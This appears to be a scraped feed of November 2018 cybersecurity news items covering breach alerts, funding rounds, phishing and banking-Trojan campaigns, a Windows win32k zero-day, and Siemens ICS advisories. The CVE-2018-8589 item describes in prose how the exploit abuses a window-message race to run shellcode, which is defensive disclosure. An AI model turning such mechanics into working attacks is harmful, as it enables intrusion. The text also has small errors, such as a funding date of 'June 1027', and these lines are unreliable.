“So we do not know whether an individual user is still at risk, and cannot trigger user-specific alerts,” Crouch points out.
Initially, Firefox will display the alert if the user has never seen such a warning before, but only for breached sites that have been added to HIBP within the last 12 months. After that, the alert will be displayed to the user if they visit a breached site that has been added to HIBP within the last 2 months.
The 12-month and 2-month policy, Mozilla believes, involves reasonable timeframes to inform users on password-reuse and unchanged-password risks.
“A longer alert timeframe would help us ensure we make even more users aware of the password-reuse risk. However, we don’t want to alarm users or to create noise by triggering alerts for sites that have long since taken significant steps to protect their users. That noise could decrease the value and usability of an important security feature,” Crouch says.
The initial approach is meant to bring attention, awareness, and information to users, as well as to begin receiving feedback from them.
Moving forth, however, Mozilla plans on implementing a more sophisticated alert policy, and says it would work together with users, partners, and service operators for that. Such a policy would be based on “stronger signals of individual user risk, and website mitigations.”
Industrial Cybersecurity Firm Dragos Raises $37 Million
16.11.2018 securityweek IT
Industrial cybersecurity firm Dragos on Wednesday announced that it has raised $37 million in a Series B funding round, which brings the total raised by the company to date to over $48 million.
The funding round was led by Canaan, with participation from Emerson, National Grid, and Schweitzer Engineering Laboratories (SEL), along with some existing investors. Joydeep Bhattacharyya, partner at Canaan, joins Dragos’ board of directors.
The money will be used for growing the company’s team in all areas, international expansion, and accelerating the growth of its software platform, intelligence, and threat operations services.
“The Series B raising period only lasted a few weeks and over 84 venture firms reached out to talk to us,” said Robert Lee, CEO of Dragos. “The speed of the B round and the number of potential investors is a sign that the market is evolving and that people are becoming aware that copy/pasting your enterprise security strategy into the industrial networks simply won’t work. Industrial specific people, processes, and technology are needed for industrial security because our threats and challenges are different.”
Dragos provides a threat detection and response platform, threat hunting and incident response services, and weekly intelligence reports. The company has been involved in investigating the Triton/Trisis incident and presented some of its findings at SecurityWeek’s ICS Cyber Security Conference last month.
“In Dragos’ Series A in July of 2017 we raised $10M and we were constantly told by investors that the industrial security market is too small and too slow,” Lee said. “However, we were able to prove out a lot in the last year and a half since our A round thanks to our customers who were far more numerous than we could have projected and much more forward leaning than the markets folks thought they were.”
The industrial cybersecurity market has been growing and established players of the IT cybersecurity market are looking to expand their operations into this space. IoT security company ForeScout recently announced the acquisition of operational technology (OT) network security firm SecurityMatters for roughly $113 million in cash.
OPM Security Improves, But Many Issues Still Unresolved: GAO
16.11.2018 securityweek BigBrothers
The U.S. Office of Personnel Management (OPM) has improved its security posture since the data breaches disclosed in 2015, but many issues are still unresolved, according to a report published this week by the Government Accountability Office (GAO).
In June 2015, OPM revealed that malicious actors had gained access to systems storing the personnel records of roughly 4.2 million federal employees. One month later, the agency reported that information on background investigations for 21.5 million people was also exposed in a separate but related breach.
The GAO has conducted several reviews of OPM security since these incidents and made a total of 80 recommendations for improving the organization’s security posture.
According to the GAO, as of September 20 the agency had implemented 51 of the 80 recommendations and it plans on implementing another 25 by the end of 2018. Another three should be implemented by the end of fiscal year 2019. However, one recommendation, referring to the deployment of a security tool on contractor workstations, will not be implemented.
“The agency asserted that it has compensating controls in place to address the intent of this recommendation, but has not provided evidence to us of these controls,” the GAO report reads.
The GAO says the agency has not provided sufficient evidence that four recommendations made in May 2016 have been implemented. This includes enhancing security plans, updating remedial action plans for certain systems, performing a comprehensive security control assessment, and tracking specialized training.
A report from August 2016 makes 62 recommendations, of which OPM had apparently failed to implement 16 by September 20, 2018. This includes issues related to multiple people using the same admin accounts, procedures for the use of special privileges on a key system, encrypting passwords, and installing the latest updates on network devices supporting a high-impact system.
OPM has also failed to take action on six issues highlighted in an August 2017 report from the GAO, including resetting all passwords after the breach, ensuring that critical patches are quickly deployed, regularly evaluating account privileges, and assessing controls on selected systems.
The agency has also failed to demonstrate that it has improved its process for validating corrective actions, and that it has developed training requirements for staff using monitoring tools.
“Implementing all of the remaining open recommendations expeditiously is essential to OPM ensuring that appropriate security controls are in place and operating as intended,” the GAO said in its report. “Until OPM implements these recommendations, its systems and information will be at increased risk of unauthorized access, use, disclosure, modification, or disruption.”
GreatHorn Expands Email Security Platform
16.11.2018 securityweek Security
Waltham, MA-based GreatHorn has expanded its machine-learning phishing protection system into a complete email security platform. "This major new expansion of the Company's flagship solution," it announced on November 14, "addresses every potential stage of a phishing attack with integrated threat detection, protection, defense, and incident response."
"We believe that email is the most critical business communication system in existence, and that requires best-in-class protection," explains GreatHorn's CEO and co-founder Kevin O'Brien, "not just a small point solution, plug-in or add-on."
Four new modules have been added to the existing product: imposter protection (which offers protection against attacks via spoofed and look-alike domains, and business email compromise -- BEC -- attacks); link protection (which includes automated URL sandboxing to protect against link-based credential theft); attachment protection (including file isolation for protection against zero-day attacks via attachments); and mailbox protection (providing personalized email protection for users based on their individual communication patterns and relationships).
The mailbox protection module is effectively a new product available as an Outlook or Chrome plug-in. It is available today in beta from GreatHorn; but will soon be on general release via the Microsoft Office Store or the Google Chrome Web Store. Its purpose is to provide the user with the tools and context necessary to make better decisions on how they interact with their email.
O'Brien believes that users are often dismissed as the company's weakest link without ever being given the information necessary to make intelligent decisions. "The security industry continues to treat users as the ëweakest link' in their security practices, rather than as intelligent, informed, and vital parts of a true security posture," he said.
"Until today, email users have not been provided with meaningful context or the security tools they need to make better risk decisions at the moment that they open and interact with their messages. With GreatHorn Mailbox Protection, however, relationship and risk data will be immediately and easily accessible to the user without needing technical training or having to navigate to another system. GreatHorn Mailbox Protection empowers end users to take action from the front lines, further reducing their organizations' susceptibility to today's advanced email attacks."
Information provided to the email user includes the strength of their relationship (and that of their organization) with the sender; the data of their most recent outbound communication with the sender, the likelihood that the email comes from the purported domain; and the relative risk of any embedded links within the email.
The user is then able to make an intelligent decision -- to accept the email at face value, to mark it as phishing and quarantine it, or as spam and delete it, or to add the sender to a personal block list to reduce unwanted email.
The platform isn't simply based on the addition of the new modules -- the existing product has also been enhanced. "As part of the expansion," GreatHorn told SecurityWeek, "we have made substantial updates to other parts of the platform, specifically Adaptive Threat Detection, Automated Threat Defense, and Post-Delivery Incident Response, which run across the platform regardless of the type of attack."
The threat detection algorithms have been improved in their ability to calculate relationship strength and communication patterns, and the organizational and technical fingerprinting is enhanced to detect more nuanced anomalies such as domain authentication drift.
Threat detection is improved with URL rewriting and sandboxing, and analysis at both ingest and time of click -- with greater administrative control over user interaction with suspicious links. Threat-specific context and warnings with configurable banners have been added.
The new platform is well-received by GreatHorn customers. "As the nation's largest financial life management firm, United Capital Partners is a constant target for cybercriminals looking to gain financial advantage," commented Brandon Gage, senior vice president of technology at United Capital Partners. "Imposter Protection from phishing and other fraudulent cyber-attacks, in particular, has been a critical focus for our GreatHorn implementation. We're pleased with the decreased risk profile we've achieved through our collaboration with GreatHorn and have already seen additional value with the solution's improved spoofing detection."
GreatHorn, founded in 2015 by Kevin O'Brien and Raymond Wallace, raised $6.3 million Series A funding led by TechStars Venture Capital Fund and .406 Ventures in June 1027.
Report Shows Increase in Email Attacks Using .com File Extensions
16.11.2018 securityweek Phishing
Leesburg, VA-based anti-phishing firm Cofense (formerly PhishMe) has discovered an uptick in the use of .com file extensions in phishing emails.
The .com file extension designated executable files in DOS and Windows 95, 98 and Me. It has been replaced by .exe in later versions of the operating system -- for example, the early Windows shell program command.com was replaced by cmd.exe in later versions. However, for backwards compatibility, Windows will still attempt to execute a file with the .com extension.
Throughout October, Cofense analyzed 132 unique phishing samples with the .com extension. To put this uptick in context, it found only 34 samples in the entire preceding nine months of 2018.
The most popular subject line lures in the new campaign (or campaigns) are 'payment' and 'purchase order' themes. These two make up 67% of the samples analyzed. Other themes include 'shipping', 'invoice' and 'remittance advice', giving the campaign a strong financial bias. The payload is generally information-stealing malware. "Threat actors," writes Aaron Riley, intelligence analyst at Cofense, in a blog posted Thursday, "are likely carrying out these campaigns to target employees with financial information stored on their local machines, which explains the use of information-stealing malware as the campaignsí payloads."
There is a correlation between the subject line and the delivered malware. Purchase order subject emails most commonly delivered the Loki Bot information stealer and the Hawkeye keylogger. Those with 'payment' subject lines more commonly delivered the AZORult information stealer. Riley isn't sure whether this indicates multiple groups or a single group believing that different malware better suits different targets.
Loki Bot (36%), AZORult (34%) and Hawkeye (24%) together accounted for 94% of the payloads. Pony also occurred but comprised just 4% of the payloads. In most cases, the .com payloads are directly attached to the phishing email. In some cases an attachment contained an intermediary dropper. As awareness of these methodologies increases, Riley "expects to see an increase in intermediary delivery of malicious .com files, wherein a "dropper" attachment will arrive with the phish and subsequently load the weaponized .com file onto the end point."
There was also a correlation between the malware type and their C2s. The samples of .com binaries that delivered AZORult communicated exclusively with domains hosted by Cloudflare. More than 75% of those delivering Loki Bot did similarly (Hawkeye stood apart, communicating exclusively with unique email domains). Cofense does not believe that Cloudflare is hosting the actual C2, but is rather being used as a domain front.
"By using Cloudflare," writes Riley, "which is typically trusted by most organizations, the attackers are able to circumvent blocks that might be put in place. Cloudflare recently changed its policies to disallow its use for malicious hosting, yet the service has continued to be used by attackers for malicious redirection."
Cofense expects to see an increased incidence of malware using the .com extension, with similar campaigns expanding to other industries such as healthcare and telecommunications. "An increased use of the .com extensions," warns Riley, "can be harmful to enterprise networks if organizations are not prepared for it, and once they are, another file extension will surge in popularity in a constant effort to stay ahead of the defense."
Cofense has a different approach to anti-phishing than many of its competitors. While machine learning and artificial intelligence is increasingly being used by technology to detect phishing and other forms of malicious email, Cofense concentrates on harnessing the collective intelligence of the users who receive the email. It trains user awareness, encourages user reporting, and analyzes those reports.
Cofense, formerly known as PhishMe, was acquired by a private equity consortium in February 2018. The deal valued the firm at $400 million. PhishMe had previously raised around $58 million in various funding rounds, including $42.5 million Series C funding in July 2016.
Black Friday alert
16.11.2018 Kaspersky Security
Banking Trojans target popular e-commerce brands to steal data
Banking Trojans traditionally target users of online financial services; looking for financial data to steal or building botnets out of hacked devices for future attacks. However, over time, several of these banking Trojans have enhanced their functionality, launching new variants and extending their range. Some are now able to obtain root access to infected devices, perform transactions, inject other malicious code, record video, and more. And the victims of such malware are not just people who bank online but online shoppers in general.
According to Kaspersky Lab data, 14 malware families are targeting e-commerce brands to steal from victims. The main ones are Betabot, Panda, Gozi, Zeus, Chthonic, TinyNuke, Gootkit2, IcedID and SpyEye. They are all banking Trojans. Detections of their e-commerce-related activity has increased steadily over the last few years, from 6.6 million in 2015 to an estimated 12.3 million by the end of 2018 (based on the extrapolation of a detection number of 9.2 million at the end of Q3, 2018), with a 12% increase between 2016 and 2017, and a 10% expected rise between 2017 and 2018.
Overall detection data for main malware Trojans targeting users of e-commerce brands, 2015 – 2018. Source: KSN (download)
The Trojans are using the e-commerce brands to hunt user credentials like login, password, card number, phone number, and more. In order to do so, the malware can intercept input data on target sites, modify online page content, and/or redirect visitors to phishing pages.
For example, the Trojans enable the cybercriminals behind them to monitor users’ online behavior: tracking which sites are visited on the infected device. If the Trojan spots the user browsing to a target e-commerce website, it activates its form-grabbing functionality. ‘Form grabbing’ is a technique used by criminals to save all the information that a user enters into forms on a website. And on an e-commerce website, such forms are almost certain to contain: login and password combination as well as payment data such as credit card number, expiration date and CVV. If there is no two-factor transaction confirmation in place, then the criminals who obtained this data can use it to steal money.
The 14 malware families were found to be targeting a total of 67 consumer e-commerce sites between them. This includes 33 ‘consumer apparel’ sites (clothing, footwear, gifts, toys, jewelry and department stores), eight consumer electronics sites, eight entertainment and gaming sites, three popular telecoms sites, two online payment sites, and three online retail platforms, among others.
Betabot targets as many as 46 different brands, and was the only Trojan to target entertainment and gaming sites, while Gozi targets 36 brands overall, and Panda 35.
Proportion of e-commerce categories targeted by malware, 2018 (download)
Why would banking Trojans target e-commerce sites?
One possibility is financial gain by selling the credentials: our research uncovered over three million sets of e-commerce credentials up for sale on a marketplace easily accessible through the Google search engine. The highest prices are charged for what appear to be hacked merchant accounts.
Another way of making money could be to use rather than sell the compromised credentials. Cybercriminals could, for example, use the stolen accounts in money-laundering schemes: buying things from a website using victims’ credentials so they look like known customers and don’t trigger any anti-fraud measures, and then selling those items on again.
In 2018, malware attacks to steal data through e-commerce brands were particularly active in European countries, including Italy, Germany and France, as well as in North America, Russia and emerging markets.
For example, most of those affected by Betabot attacks through e-commerce sites were located in Italy (where 14.13% of users affected by any malware in the first eight months of 2018 were targeted by this threat), Germany (6.04%), Russia (5.5%) and India (4.87%). For Gozi the pattern was similar: 19.57% of users affected by any malware in Italy were targeted by this threat, with Russia second (13.89%), followed by Brazil (11.96%) and France (5.91%).
Advice and recommendations
To stay safe from such threats during the busy festive shopping season, Kaspersky Lab recommends taking the following security measures:
If you are a consumer
A powerful, updated security solution is a must for all devices you use to shop online. Avoid buying anything online from websites that look potentially dangerous or resemble an incomplete version of a trusted brand’s website.
Don’t click on unknown links in email or social media messages, even from people you know, unless you were expecting the message.
If you are an online brand or trader
Use a reputable payment service and keep your online trading and payment platform software up to date. Every new update may contain critical patches to make the system less vulnerable to cybercriminals.
Use a tailored security solution to protect your business and customers.
Pay attention to the personal information used by customers to buy from you. Use a fraud prevention solution that you can adjust to your company profile and the profile of your customers.
Think about how much money you wish to keep in an online payment transaction account at any one time. The greater the balance, the higher the value of that account to hackers.
Restrict the number of attempted transactions and always use two-factor authentication (Verified by Visa, MasterCard Secure Code, etc.).
The research is based on data obtained with user consent and processed using Kaspersky Security Network (KSN). All malware belonging to the banking Trojans covered in the report are detected and blocked by Kaspersky Lab security solutions.
Yesterday, Microsoft published its security bulletin, which patches a vulnerability discovered by our technologies. We reported it to Microsoft on October 17, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8589.
In October 2018, our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft’s Windows operating system. Further analysis revealed a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer in order to gain the necessary privileges for persistence on the victim’s system. So far, we have detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.
Kaspersky Lab products detected this exploit proactively using the following technologies:
Behavioral Detection Engine and Automatic Exploit Prevention for endpoints
Advanced Sandboxing and Anti-Malware Engine for Kaspersky Anti Targeted Attack Platform (KATA)
Kaspersky Lab verdicts for the artifacts in this campaign are:
More information about the attack is available to customers of Kaspersky Intelligence Reports. Contact: email@example.com
CVE-2018-8589 is a race condition present in win32k!xxxMoveWindow due to improper locking of messages sent synchronously between threads.
The exploit uses the vulnerability by creating two threads with a class and associated window and moves the window of the opposite thread inside the callback of a WM_NCCALCSIZE message in a window procedure that is common to both threads.
WM_NCCALCSIZE message in win32k!xxxCalcValidRects
Termination of the opposite thread on the maximum level of recursion inside the WM_NCCALCSIZE callback will cause asynchronous copyin of the lParam structure controlled by the attacker.
Lack of proper message locking between win32k!xxxCalcValidRects and win32k!SfnINOUTNCCALCSIZE
The exploit populates lParam with pointers to the shellcode and after being successfully copyied to kernel inside win32k!SfnINOUTNCCALCSIZE, the kernel jumps to the user level. The exploit found in the wild only targeted 32-bit versions of Windows 7.
BSOD on an up-to-date version of Windows 7 with our proof of concept
As always, we provided Microsoft with a proof of concept for this vulnerability along with well-written source code.
Congress passes bill that create new Cybersecurity and Infrastructure Security Agency at DHS
16.11.2018 securityaffairs BigBrothers
The U.S. House of Representatives passed the CISA bill that creates a new cybersecurity agency at the Department of Homeland Security (DHS).
In October, the Senate passed the Cybersecurity and Infrastructure Security Agency (CISA) Act (H.R. 3359), now the Congress passed the legislation unanimously and it is going to be signed by the President.
When the bill will be signed the National Protection and Programs Directorate (NPPD) will become the Cybersecurity and Infrastructure Security Agency (CISA) with the responsibility for cyber and physical infrastructure security.
“The National Protection and Programs Directorate of the Department shall, on and after the date of the enactment of this subtitle, be known as the `Cybersecurity and Infrastructure Security Agency’ (in this subtitle referred to as the `Agency’).” reads the bill.
“Today’s vote is a significant step to stand up a federal government cybersecurity agency,” said Secretary Kirstjen M. Nielsen. “The cyber threat landscape is constantly evolving, and we need to ensure we’re properly positioned to defend America’s infrastructure from threats digital and physical. It was time to reorganize and operationalize NPPD into the Cybersecurity and Infrastructure Security Agency. I thank Chairman Michael McCaul and Ranking Member Bennie Thompson for recognizing our critical role and both starting and completing this transformation in the House of Representatives. I also thank Chairman Ron Johnson and Ranking Member Claire McCaskill for their tireless support of the CISA Act in the Senate.”
The bill aims at securing federal networks and protecting critical infrastructure from cyber and physical threats.
“The CISA Act passing Congress represents real progress in the national effort to improve our collective efforts in cybersecurity,” said NPPD Under Secretary Christopher Krebs. “Elevating the cybersecurity mission within the Department of Homeland Security, streamlining our operations, and giving NPPD a name that reflects what it actually does will help better secure the nation’s critical infrastructure and cyber platforms. The changes will also improve the Department’s ability to engage with industry and government stakeholders and recruit top cybersecurity talent.”
Kaspersky Lab opens first Transparency Center in Zurich
16.11.2018 securityaffairs IT
Kaspersky Lab starts data processing for European users in Zurich and also launched the first Transparency Cente under the announced Transparency Initiative
From today, malicious and suspicious files shared by users of Kaspersky Lab products in Europe will start to be processed in data centers in Zurich, initiating the first part of a relocation commitment made by the company in late 2017 under its Global Transparency Initiative. The move reflects Kaspersky Lab’s determination to assure the integrity and trustworthiness of its products and is accompanied by the opening of the company’s first Transparency Center, also in Zurich.
The relocation of data processing is part of a major infrastructure move designed to increase the resilience of the company’s IT infrastructure to risks of data breaches and supply-chain attacks, and to further prove the trustworthiness of its products, services and internal processes.
From November 13, threat-related data coming from European users will start to be processed in two datacenters. These provide world-class facilities in compliance with industry standards to ensure the highest levels of security.
The data, which users have actively chosen to share with Kaspersky Lab, includes suspicious or previously unknown malicious files and corresponding meta-data that the company’s products send to Kaspersky Security Network (KSN) for automated malware analysis.
Files comprise only part of the data processed by Kaspersky Lab technologies, yet the most important one. Protection of customers’ data, together with the safety and integrity of infrastructure is a top priority for Kaspersky Lab, and that is why the file processing relocation comes first and is expected to be fully accomplished by the end of 2019. The relocation of other types of data processed by Kaspersky Lab products, consisting of several kinds of anonymized threat and usage statistics, is planned to be conducted during later phases of the Global Transparency Initiative.
Today also marks the opening of Kaspersky Lab’s first Transparency Center in Zurich, enabling authorized partners to access reviews of the company’s code, software updates and threat detection rules, along with other activities.
Through the Transparency Center, Kaspersky Lab will provide governments and partners with information on its products and their security, including essential and important technical documentation, for external evaluation in a secure environment.
These two major developments will be followed by the relocation of data processing for other regions and, in phase two, the move to Zurich of software assembly.
According to independent rankings, Switzerland is among the world’s top locations in terms of the number of secure internet servers available, and it has an international reputation as an innovative center for data processing and high quality IT infrastructure. Being in the heart of Europe and, at the same time, a non-EU member, it has established its own data privacy regulation that is guaranteed by the state’s constitution and federal laws. In addition, there are strict regulations on processing data requests received from authorities.
Commenting on the start of data processing in Europe and the opening of the first Transparency Center, Eugene Kaspersky, CEO Kaspersky Lab said:
“Transparency is becoming the new normal for the IT industry– and for the cybersecurity industry in particular. We are proud to be on the front line of this process. As a technological company, we are focused on ensuring the best IT infrastructure for the security of our products and data, and the relocation of key parts of our infrastructure to Switzerland places them in one of the most secure locations in the world. The promises made in our Global Transparency Initiative are coming to fruition, enhancing the resilience and visibility of our products. Through the new Transparency Center, also in Switzerland, trusted partners and governments will be able to see external reviews of our products and make up their own minds. We believe that steps such as these are just the beginning – for the company and for the security industry as a whole. The need to prove trustworthiness will soon become an industry standard.”
Commenting on Kaspersky Lab’s infrastructure move to Switzerland, Liv Minder, Investment Promotion Director from Switzerland Global Enterprise, added:
“The settlement of Kaspersky’s Transparency Center in Switzerland underlines that our country has become a global center for innovation and technology with a strong cyber security cluster, offering advanced and secure digital infrastructure within a strong framework of security and privacy that attracts ever more technology leaders.”
Kaspersky Lab’s Global Transparency Initiative was announced in October 2017 and continues to make good progress. In addition to the Transparency Center opening and the IT infrastructure relocation, a number of other actions are being undertaken.
In particular, Kaspersky Lab has engaged one of the Big Four professional services firms to conduct an audit of the company’s engineering practices around the creation and distribution of threat detection rule databases, with the goal of independently confirming their accordance with the highest industry security practices.
The assessment will be done under the SSAE 18 standard (Statement of Standards for Attestation Engagements). The scope of the assessment includes regular automatic updates of antivirus records, created and distributed by Kaspersky Lab for its products operating on Windows and Unix Servers. The company is planning the assessment under SSAE 18 with the issue of the SOC 2 (The Service and Organization Controls) report for Q2 2019.
Additionally, Kaspersky Lab continues to improve the security of its products with the help of a community of security enthusiasts from all over the world. Within one year, Kaspersky Lab resolved more than 50 bugs reported by security researchers, of which several were acknowledged to be especially valuable.
Learn more about Kaspersky Lab transparency principles and the Global Transparency Initiative here: www.kaspersky.com/about/transparency
DUST Identity Emerges From Stealth to Protect Device Supply Chain
15.11.2018 securityweek Safety
Boston, MA-based start-up firm DUST Identity has emerged from stealth with $2.3 million seed funding led by Kleiner Perkins, with participation from New Science Ventures, Angular Ventures, and Castle Island Ventures. It was founded in 2018 by Ophir Gaathon (CEO), Jonathan Hodges (VP engineering) and Dirk Englund (board member).
DUST, an anagram for 'diamond unclonable security tag', has developed a method to ensure the provenance and integrity of any object. Its purpose is to protect the physical supply chain from manufacture to installation, and during continued use. In essence, a very tiny spray of diamond particles is applied to any surface. The pattern created is random but unique to each object. This is scanned and recorded, and becomes the object's fingerprint. Any physical attempt to tamper with the object disturbs the fingerprint and becomes known.
DUST IdentityThe spray pattern is random by design. DUST takes the view that if it could predefine a pattern, then an adversary would be able to copy it. Instead it allows the vagaries of nature and the environment to create an unclonable unique pattern.
DUST does not prevent physical tampering, but will highlight any such attempt -- successful or not. The identity of the original object can be confirmed, and the integrity of the supply chain can be proven. If the fingerprint at installation matches the fingerprint at manufacture, the object provenance within the supply chain is guaranteed.
CEO and co-founder Ophir Gaathon explains the process. "We take diamonds that are tiny and cheap," he told SecurityWeek. "We add that to the conformal coating process." Conformal process is a standard process that adds a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ëconformsí to the circuit board or object topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants.
"We're flavoring that polymer with a little bit of diamond," continued Gaathon."From that point on you effectively have an identity layer that is completely random -- we cannot replicate that signature -- and the customer organization can decide which specific location on the board it wishes to authenticate. In order to deploy Dust as an anti-tamper solution, you first need identify the object, and then define a specific fingerprint or fingerprints on that object that will allow you to see if anyone has tried to scratch off any part of the polymer coating, or lift off a specific component or access a programming port on the board itself -- and all of that can be done with the same workflow you've been using." Light touches won't affect the identity -- but serious attempts to get under the polymer coating will.
It is the size of the particulate spray that makes the system both workable and affordable. "What we've built is a game changer for supply-chain security," said Gaathon. "Lack of hardware integrity can have a devastating impact on many levels, and our goal is to elevate the entire business operations ecosystem with more accountability and transparency. We help enterprises and governments to prevent hardware tampering and data breaches, improve suppliers trust, and modernize supply chain data management. Compared to other technologies such as RFID, holograms or barcodes, our proprietary solution is significantly more secure, durable, agile, customizable and cost effective."
At an area of 0.0025 mm2 DUST fits on the world's smallest electronic components -- and Gaathon confirmed to SecurityWeek that it could uniquely fingerprint the tip of a needle. With the potential for 10^230 unique fingerprints it could theoretically identify every needle in the world. The carbon content is at a non-toxic level, and the diamond material is durable -- ensuring that the coating will safely outlast the life-cycle of the electronic devices it protects.
"DUST Identity is introducing a scientifically-backed solution for supply chain management fit for mission-critical enterprises -- from military defense to automation to healthcare -- who prioritize security first, but also want tools that are cost-efficient and easy to deploy," said Ilya Fushman, General Partner at Kleiner Perkins. "DUST Identity's technology is truly cutting-edge and we're excited to partner with this unique team of scientists, engineers and technologists."
Supply chain attacks of the type reported by Bloomberg in October 2018 -- subsequently denied by all parties -- could be prevented by DUST. Any attempt to attach an additional chip, however tiny, to a coated motherboard would disturb the fingerprint and be detectable on delivery.
DUST Identity has come out of MIT. It was formed by a team of quantum physics, nanotechnology and cyber experts, and has participated in several DARPA programs.
Misconfiguration a Top Security Concern for Containers
15.11.2018 securityweek Security
Report Demonstrates that Security Needs to be Included in Containerization
Although the acceptance and adoption of containers within DevOps is growing, concern over their security remains strong. Thirty-five percent of respondents to a new survey believe their company does not adequately invest in container security, while a further 15% don't think their company takes the threat to containers seriously.
The survey (PDF) was undertaken by StackRox among 230 IT staff -- almost half of whom identify IT security as their primary role. More than 45% are employed in companies with more than 10,000 employees, while 58% are employed in either the fintech or technology sectors. The StackRox inaugural report, 'The State of Container Security', found that most organizations feel unprepared to adequately secure cloud-native applications, despite the surging adoption of containers and Kubernetes.
Docker is the most popular container runtime, used by 189 of the respondents. Kubernetes, originally developed by Google, is the most popular container orchestrator, used by 122 of the respondents. Docker Swarm is the second most popular orchestrator, used by 93 of the respondents primarily from the larger organizations with 5,000 or more employees.
Forty percent of the respondents operate their containers in a hybrid environment -- both on prem and in the cloud. Twenty-eight percent are cloud only, while a surprising 32% are on premise only. Of those containers in the cloud, 118 of the respondents use AWS, 56 use Azure, and 39 use Google Cloud Platform. "This ranking would be a bit surprising given Google's industry leadership in container usage and Kubernetes," comments the report, "but is less surprising given the dominance of large enterprises in our survey pool."
Misconfiguration within the orchestrator is the biggest security concern at 54% of respondents. These concerns cover both the Docker containers and the Kubernetes orchestrator, Wei Lien Dang, VP of products at StackRox, told SecurityWeek. "Among the best known 'container attacks' are the Tesla cryptomining incident on AWS and the Shopify published vulnerability around metadata. Both of those issues stemmed from misconfiguration of the orchestrator."
In February 2018 it was disclosed by RedLock that a Kubernetes container run by Tesla on AWS had been hijacked and used for cryptomining. Once discovered, Tesla was able to lock down its servers within a day. It's not that Kubernetes cannot be made secure, it is the complexity and granularity of required access to containers that becomes difficult -- and it is this that leads the survey respondents to be concerned about misconfigurations.
"The security challenge for Kubernetes is not the access directly to the platform to log in and launch an attack," explains Wei Lien Dang. "Rather, it's that Kubernetes often accidentally gets configured with exposed pieces -- the dashboard, for example, or the metadata will be accessible, and itís via those misconfigurations that attacks can happen."
This is exacerbated by the tendency for containers to be under the aegis of DevOps, and for DevOps to not necessarily include security team involvement.
"The group using containers and configuring Kubernetes most often is DevOps," he continued. "The challenge is for the Security team to be involved in setting the policies and guidelines for securing that infrastructure. The goal of any container security solution should be to help Security bridge into the DevOps world -- providing the security oversight and guidance but leveraging the tooling and processing of DevOps."
Like many powerful platforms, StackRox believes that Kubernetes is best served with an abstraction layer on top. StackRox acts like that security abstraction layer highlighting misconfigurations and pinpointing risks like unnecessary open communications paths that leave assets at risk.
Commenting on the findings of the survey, Mark Bouchard, co-founder and the COO at research and consulting CyberEdge Group, said, "Human error has been responsible for creating the majority of security risks in every wave of infrastructure change, and it's no different with containers and Kubernetes. It's crucial that the security tooling for this infrastructure automatically flags the most well-known misconfigurations across the full ecosystem."
"StackRox helps with both asset management -- simply identifying the breadth of containers deployed -- and securing the containers and Kubernetes environments," explains Wei Lien Dang. "The StackRox Container Security Platform helps secure the images themselves and assess risk during the build process, harden the environment and reduce the attack surface during the deploy phase, and find and stop malicious activities during the runtime phase. The tight integration between the StackRox platform and Kubernetes and the container ecosystem enables security be operationalized across the entire life cycle."
This would be best managed by the security team. Concern over the security of containers should be the spur to transform company DevOps into company Security DevOps.
"The influence of DevOps and the fast uptake in containerization and Kubernetes have made application development more seamless, efficient and powerful than ever. Yet, our survey results show that security remains a significant challenge in enterprisesí container strategies," said Kamal Shah, StackRox CEO. "Containers provide a natural bridge for collaboration between DevOps and security teams, but they also introduce unique risks that, if left unchecked, can create real risks for the enterprise."
Founded in 2014 and headquartered in Mountain View, California, StackRox raised $25 million in Series B funding in April 2018, bringing the total raised to date by the company to more than $39 million.
Siemens Releases 7 Advisories for SIMATIC, SCALANCE Vulnerabilities
15.11.2018 securityweek ICS
Siemens on Tuesday released 7 new advisories to inform customers of potentially serious vulnerabilities affecting various SIMATIC and SCALANCE products. Patches and/or mitigations are available for all impacted products.
According to the industrial giant, members of China’s CNCERT/CC discovered two high severity flaws in SIMATIC S7 CPUs. An attacker who has access to impacted devices on TCP port 102 via Ethernet, MPI or Profibus can cause a denial-of-service (DoS) condition by sending specially crafted packets.
Exploitation of the flaw, which requires no user interaction, could result in the targeted device going into defect mode until it’s manually rebooted.
While DoS vulnerabilities are often less serious from an IT perspective, in the case of industrial control systems (ICS), where availability is critical, these types of flaws can have a severe impact, including physical damage to equipment and incidents that could lead to loss of human life.
Siemens also told customers that some SIMATIC human-machine interfaces (HMIs) are affected by a high severity flaw that can be exploited by an unauthenticated attacker to download arbitrary files from a device without any user interaction. A less serious vulnerability in the same products allows attackers to redirect targeted users to arbitrary websites by getting them to click on a malicious link.
These products also contain a medium severity HTTP header injection vulnerability, Siemens said.
Learn More About ICS Vulnerabilities at SecurityWeek’s ICS Cyber Security Conference
A researcher from industrial cybersecurity firm Applied Risk discovered that Siemens’ SCALANCE S firewalls are affected by a cross-site scripting (XSS) vulnerability that can be exploited to bypass important security measures. The targeted user needs to be authenticated with administrator privileges and click on a specially crafted link.
Siemens has rated this vulnerability as “medium severity” with a CVSSv3 score of 4.7. Applied Risk, on the other hand, believes this is a “high severity” issue and assigned it a CVSSv3 score of 8.2.
Another advisory published by Siemens this week describes an authentication bypass vulnerability in the SIMATIC IT Production Suite, an IT solution that bridges control systems and business systems. The vendor noted that exploitation requires a valid username and access to the network, but no privileges or interaction are needed to conduct an attack.
The remaining advisories published by Siemens describe medium severity issues, including a DoS vulnerability in SIMATIC S7 CPUs, and a SIMATIC STEP7 flaw that can be exploited to obtain passwords stored in a project.
Siemens is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.
ICS-CERT has also published advisories this week for these and other vulnerabilities affecting products from Siemens.
US Panel Warns Against Government Purchase of Chinese Tech
15.11.2018 securityweek IT
A congressional advisory panel says the purchase of internet-linked devices manufactured in China leaves the United States vulnerable to security breaches that could put critical infrastructure at risk.
In its annual report on Wednesday, the U.S.-China Economic and Security Review Commission warns of dangers to the U.S. government and private sector from a reliance on global supply chains linked to China, which is the world's largest manufacturer of information technology equipment.
China's push to dominate in the high-tech industry by 2025 already is a sore point with Washington and a contributing factor in trade tensions that have seen the world's two largest economies slap billions of dollars in punitive tariffs on each other's products this year.
